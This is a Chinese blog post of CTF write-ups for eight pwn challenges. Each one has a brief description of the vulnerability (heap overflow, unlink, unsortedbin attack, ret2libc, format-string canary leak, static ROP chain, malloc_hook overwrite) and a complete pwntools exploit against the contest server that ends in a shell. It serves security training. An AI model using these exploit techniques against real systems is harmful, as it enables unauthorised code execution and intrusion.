第五**空间pwn部分wp

发表于

发现太久没有写博客了,就放一下刚打完的被喷得怪可怜的第5**空间的一点wp吧。

立雪

edit 函数没有对size进行检测,所以可以任意长度的堆溢出

而且程序存在后门函数,unlink到0x602088修改为0xffff即可(其实最快速的做法是unsortedbin attack到0x602088)

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
from pwn import *

\# context.log_level = 'debug'

\# p = process('./pwn15')

p = remote("111.33.164.4","50015")

sd = lambda s:p.send(s)

sl = lambda s:p.sendline(s)

rc = lambda s:p.recv(s)

ru = lambda s:p.recvuntil(s)

def new(l,data):

​	ru("choice:")

​	sl('1')

​	ru("note:")

​	sl(str(l))

​	ru("note:")

​	sl(data)

def delete(id):

​	ru("choice:")

​	sl('3')

​	ru("Index:")

​	sl(str(id))

def edit(id,l,data):

​	ru("choice:")

​	sl('2')

​	ru("Index:")

​	sl(str(id))

​	ru("note:")

​	sl(str(l))

​	ru("note:")

​	sl(data)

ptr = 0x6020C0

fd = ptr - 8*3

bk = ptr - 8*2

\# pay = 0x18*'a' + p64(0xffffffffffffffff)

\# edit(0,0x28,pay)

new(0x20,'b')

new(0xa0,'c')

new(0x20,'a')

pay = p64(0) + p64(0x20) + p64(fd) + p64(bk) + p64(0x20) + p64(0xb0)

edit(0,0x30,pay)

delete(1)

pay = p64(0)*3 + p64(0x602088)

edit(0,0x40,pay)

edit(0,8,p32(0xffff))

ru("choice:")

sl('2019')

\# gdb.attach(p)

p.interactive()

拈花

分析函数可以知道有明显的栈溢出漏洞,直接ret2libc攻击,先puts出puts_got的真实地址然后再跳一次,回到main,再执行system函数直接getshell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#coding=utf8

from pwn import *

context.log_level = 'debug'

context(arch='amd64', os='linux')

local = 0

elf = ELF('./pwn11')

if local:

​    p = process('./pwn11')

​    libc = elf.libc

else:

​    p = remote('111.33.164.4',50011)

​    libc = ELF('./libc.so.6')

sl = lambda s : p.sendline(s)

sd = lambda s : p.send(s)

rc = lambda n : p.recv(n)

ru = lambda s : p.recvuntil(s)

ti = lambda : p.interactive()

 

def bk(addr):

​    gdb.attach(p,"b *"+str(hex(addr)))

 

ru("please input your name")

sl('king')

ru("Let's start a game,can you guess the key?")

pop_rdi_ret = 0x00000000004012ab

puts_got = elf.got["puts"]

puts_plt = elf.symbols["puts"]

py = ''

py += 'a'*0x20

py += 'aaaaaaaa'

py += p64(pop_rdi_ret)

py += p64(puts_got)

py += p64(puts_plt)

py += p64(0x401162)

sl(py)

ru("fail!\n")

puts_addr = u64(rc(6).ljust(8,'\x00'))

print "puts-->" + hex(puts_addr)

system = puts_addr - libc.symbols["puts"] + libc.symbols["system"]

binsh = puts_addr - libc.symbols["puts"] + libc.search('/bin/sh\x00').next()

py = ''

py += 'a'*0x20

py += 'aaaaaaaa'

py += p64(pop_rdi_ret)

py += p64(binsh)

py += p64(system)

ru("please input your name")

sl('king')

ru("Let's start a game,can you guess the key?")

sl(py)

p.interactive()

於讴

img

img

这里输入小于0x3E7的值就可以进去一波函数,但是没什么用,虽然不知道那里是什么(直接没理会),输入大小大于0x3E7,直接退出回到main,然后直接有个栈溢出漏洞(sub_4007E2),那么和拈花一样,直接先puts出真实地址然后回跳到main,再执行system函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#coding=utf8

from pwn import *

context.log_level = 'debug'

context(arch='amd64', os='linux')

local = 0

elf = ELF('./pwn6')

if local:

​    p = process('./pwn6')

​    libc = elf.libc

else:

​    p = remote('111.33.164.4', 50006)

​    libc = ELF('./libc-2.19.so')

sl = lambda s : p.sendline(s)

sd = lambda s : p.send(s)

rc = lambda n : p.recv(n)

ru = lambda s : p.recvuntil(s)

ti = lambda : p.interactive()

 

def debug(addr,PIE=True):

if PIE:

​        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)

​        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))

else:

​        gdb.attach(p,"b *{}".format(hex(addr)))

 

def bk(addr):

​    gdb.attach(p,"b *"+str(hex(addr)))

 

sl('10000')

ru("OH, WHY ARE YOU SO GOOD?")

pop_rdi_ret = 0x0414fc3

puts_got = elf.got["puts"]

puts_plt = elf.symbols["puts"]

py = ''

py += 'a'*0x10

py += 'aaaaaaaa'

py += p64(pop_rdi_ret)

py += p64(puts_got)

py += p64(puts_plt)

py += p64(0x400793)

sl(py)

rc(1)

puts_addr = u64(rc(6).ljust(8,'\x00'))

print "puts-->" + hex(puts_addr)

system = puts_addr - libc.symbols["puts"] + libc.symbols["system"]

binsh = puts_addr - libc.symbols["puts"] + libc.search('/bin/sh\x00').next()

py = ''

py += 'a'*0x10

py += 'aaaaaaaa'

py += p64(pop_rdi_ret)

py += p64(binsh)

py += p64(system)

sl('10000')

ru("OH, WHY ARE YOU SO GOOD?")

sl(py)

p.interactive()

副墨

img

这题有点意思,首先覆盖seed为0,写C脚本跑伪随机数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>

\#include <string.h>

int main()

{

int seed = 0;

​	srand(seed);

int v14=0;

for(int i=0;i<=9;i++)

​	{

​		v14 = rand() % 0x1869Fu + 1;

printf("%d\n",v14);

​	}

}

跑出随机数:a = [7427,39356,9595,54062,67371,42578,92585,76990,22615,53318]

第一次写入栈中的数据大小(0x2A),这里seed的偏移为0x1c,所以可以覆盖为0:

1
2
3
4
5
6
7
py = ''

py += "-%17$p-%23$p-"

py = py.ljust(0x1c,'a')

py += p64(0)

因为有格式化字符串漏洞,所以可以直接打印出canary和base基地址,然后就可以先puts出真实地址,然后回跳一次main,再执行system,思路和前面的差不多(这里onegadget用不了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
#coding=utf8

from pwn import *

context.log_level = 'debug'

context(arch='amd64', os='linux')

local = 0

elf = ELF('./bf')

if local:

​    p = process('./bf')

​    libc = elf.libc

else:

​    p = remote('111.33.164.4',50001)

​    libc = ELF('./libc-2.19.so')

 

sl = lambda s : p.sendline(s)

sd = lambda s : p.send(s)

rc = lambda n : p.recv(n)

ru = lambda s : p.recvuntil(s)

ti = lambda : p.interactive()

 

def debug(addr,PIE=True):

if PIE:

​        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)

​        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))

else:

​        gdb.attach(p,"b *{}".format(hex(addr)))

 

a = [7427,39356,9595,54062,67371,42578,92585,76990,22615,53318]

ru("Are you sure want to play the game?")

sl('1')

ru("Input your name : ")

py = ''

py += "-%17$p-%23$p-"

py = py.ljust(0x1c,'a')

py += p64(0)

sl(py)

for i in range(10):

​    ru('Now guess:')

​    sl(str(a[i]))

ru("-")

canary = int(ru("-")[:-1],16)

print "canary--->" + hex(canary)

addr = int(rc(14),16)

addr = addr&0xfffffffff000

print "addr--->" + hex(addr)

puts_got = elf.got["puts"] + addr

main = addr + 0xABF

puts_plt = elf.symbols["puts"] + addr

pop_rdi_ret =  0x0db3  + addr

\#onegadget = addr - libc.symbols["__libc_start_main"] + libc.symbols["system"]

py = ''

py += 'a'*0x34

py += p64(canary)

py += 'bbbbbbbb'

py += p64(pop_rdi_ret)

py += p64(puts_got)

py += p64(puts_plt)

py += p64(main)

sl(py)

puts_aa = u64(ru("Are")[2:-4].ljust(8,'\x00'))

print "puts_aa---->" + hex(puts_aa)

system = puts_aa - libc.symbols["puts"] + libc.symbols["system"]

binsh = puts_aa - libc.symbols["puts"] + libc.search("/bin/sh\x00").next()

ru("to play the game?")

sl('1')

ru("Input your name : ")

py = ''

py += "-%17$p-%18$p-"

py = py.ljust(0x1c,'a')

py += p64(0)

sl(py)

for i in range(10):

​    ru('Now guess:')

​    sl(str(a[i]))

py = ''

py += 'a'*0x34

py += p64(canary)

py += 'bbbbbbbb'

py += p64(pop_rdi_ret)

py += p64(binsh)

py += p64(system)

sl(py)

p.interactive()

正定

跟立雪基本一样,做立雪的时候傻逼了用了麻烦的unlink,其实可以直接unsortedbin attack

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
from pwn import *

\# context.log_level = 'debug'

\# p = process('./pwn14')

p = remote("111.33.164.4","50014")

sd = lambda s:p.send(s)

sl = lambda	s:p.sendline(s)

rc = lambda s:p.recv(s)

ru = lambda s:p.recvuntil(s)

def new(l,data):

​	ru("choice : ")

​	sl('1')

​	ru("note : ")

​	sl(str(l))

​	ru("note:")

​	sl(data)

def delete(id):

​	ru("choice : ")

​	sl('3')

​	ru("Index :")

​	sl(str(id))

def edit(id,l,data):

​	ru("choice : ")

​	sl('2')

​	ru("Index :")

​	sl(str(id))

​	ru("note : ")

​	sl(str(l))

​	ru("note : ")

​	sl(data)

new(8,'n')

new(0xa0,'a')

new(8,'b')

delete(1)

pay = p64(0)*3 + p64(0xb1) + p64(0) + p64(0x4040A0 - 0x10)

edit(0,0x40,pay)

new(0xa0,'c')

ru("choice : ")

sl('70')

\# gdb.attach(p)

p.interactive()

一苇

这题也存在后门 img

也存在栈溢出,先自用buf没有初始化打印出代码段地址绕过PIE,之后栈溢出跳转到后门

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#coding:utf-8

from pwn import *

context.log_level = 'debug'

\#内存地址随机化

def debug(addr,PIE=True):

if PIE:

​        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)

print "breakpoint_addr --> " + hex(text_base + 0x202040)

​        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))

else:

​        gdb.attach(p,"b *{}".format(hex(addr))) 

\# p = process('./pwn13')

p = remote("111.33.164.4","50013")

p.recvuntil("choice:")

p.sendline('1')

p.recvuntil("massage\n")

\# p.sendline('a'*0x28 + '\x50')

p.send('a'*9)

p.recvuntil('a'*8)

text_addr = u64(p.recv(6).ljust(8,'\x00')) - 0x61

text_addr = text_addr & 0xfffffffff000

log.info("text_addr --> %s",hex(text_addr))

p.recvuntil("choice:")

p.sendline('1')

p.recvuntil("massage\n")

\# debug(0xa2c)

p.sendline('a'*0x28 + p64(text_addr + 0xa50))

p.interactive()

坐忘

存在栈溢出,但是开启了canary ,先将canary的低位’\x00’覆盖泄漏出canary 之后就快乐溢出了,因为程序是静态编译所以ropchain一把梭,但是程序写了个base64解密,所以所有的输入都要经过base64加密

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
from pwn import *

from struct import pack

\# Padding goes here

import base64

context.log_level = 'debug'

\# io = process('./pwn9')

io = remote("111.33.164.4","50009")

io.recvuntil(">\n")

 

s = base64.b64encode('n0van0va1')

io.sendline(s)

io.recvuntil('n0van0va')

canary = u64(io.recv(8)) - 0x31

log.info("canary --> %s",hex(canary))

io.recvuntil("continue ?")

io.sendline("yes")

p = ''

p += pack('<Q', 0x0000000000401f57) # pop rsi ; ret

p += pack('<Q', 0x00000000006cb080) # @ .data

p += pack('<Q', 0x00000000004715e4) # pop rax ; ret

p += '/bin//sh'

p += pack('<Q', 0x000000000047cd21) # mov qword ptr [rsi], rax ; ret

p += pack('<Q', 0x0000000000401f57) # pop rsi ; ret

p += pack('<Q', 0x00000000006cb088) # @ .data + 8

p += pack('<Q', 0x0000000000426baf) # xor rax, rax ; ret

p += pack('<Q', 0x000000000047cd21) # mov qword ptr [rsi], rax ; ret

p += pack('<Q', 0x0000000000401e36) # pop rdi ; ret

p += pack('<Q', 0x00000000006cb080) # @ .data

p += pack('<Q', 0x0000000000401f57) # pop rsi ; ret

p += pack('<Q', 0x00000000006cb088) # @ .data + 8

p += pack('<Q', 0x00000000004433e6) # pop rdx ; ret

p += pack('<Q', 0x00000000006cb088) # @ .data + 8

p += pack('<Q', 0x0000000000426baf) # xor rax, rax ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046f140) # add rax, 1 ; ret

p += pack('<Q', 0x000000000046fea5) # syscall ; ret

io.recvuntil(">\n")

pay = 'a'*8 + p64(canary) + p64(0) + p

payload = base64.b64encode(pay)

\# gdb.attach(io,"b *0x401183")

io.sendline(payload)

io.recvuntil("continue ?")

io.sendline("no")

io.interactive()

玄冥

同样edit函数没有检测size大小,所以有任意大小的堆溢出,而且程序使用malloc申请堆块可以泄漏出main_arena ,之后 利用堆溢出伪造堆块将malloc_hook填写为system_addr 再调用malloc(binsh_addr)get shell

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
from pwn import *

context.log_level = 'debug'

\# p = process('./pwn')

local = 0

if local:

​	libc = elf.libc

else:

​	p = remote("111.33.164.4","50007")

​	elf = ELF('./pwn')

​	libc = ELF('./libc6.so')

print "remote"

​	pause()

 

sd = lambda s:p.send(s)

sl = lambda s:p.sendline(s)

rc = lambda s:p.recv(s)

ru = lambda s:p.recvuntil(s)

def add(size):

​	ru(">>")

​	sl('1')

​	ru("size:")

​	sl(str(size))

def show(id):

​	ru(">>")

​	sl('2')

​	ru("id:")

​	sl(str(id))

def edit(id,size,data):

​	ru(">>")

​	sl('3')

​	ru("id:")

​	sl(str(id))

​	ru("size:")

​	sl(str(size))

​	ru("content:")

​	sl(str(data))

def delete(id):

​	ru(">>")

​	sl('4')

​	ru("id:")

​	sl(str(id))

note_list = 0x6020E0

add(0x80)#0

add(0x10)#1

delete(0)

add(0x80)#0

show(0)

ru("data:")

main_arena = u64(rc(6).ljust(8,'\x00')) - 88

\# libc_base = main_arena - 0x3c4b20

log.info("main_arena --> %s",hex(main_arena))

\# log.info("libc_base --> %s",hex(libc_base))

one = [0x41320,0x41374,0xd6e77]

\# onegadget = libc_base + one[2]

\# log.info("onegadget --> %s",hex(onegadget))

add(0x60)#2

delete(2)

pay = p64(0)*3 + p64(0x71) + p64(main_arena-0x33)*2

edit(1,100,pay)

add(0x60)#2

add(0x60)#3

pay = 0x13*'a' + p64(elf.plt['puts'])

edit(3,0x30,pay)

add(6299680)

puts_addr = u64(rc(6).ljust(8,'\x00'))

log.info("puts_addr --> %s",hex(puts_addr))

libc_base = puts_addr - libc.symbols['puts']

onegadget = libc_base + one[1]

system = libc_base + libc.symbols['system']

binsh_addr = libc_base + libc.search("/bin/sh").next()

log.info("libc_base --> %s",hex(libc_base))

log.info("onegadget --> %s",hex(onegadget))

log.info("system --> %s",hex(system))

log.info("binsh_addr --> %s",hex(binsh_addr))

\# gdb.attach(p)

pay = 0x13*'a' + p64(system)

edit(3,0x30,pay)

add(binsh_addr)

p.interactive()
0%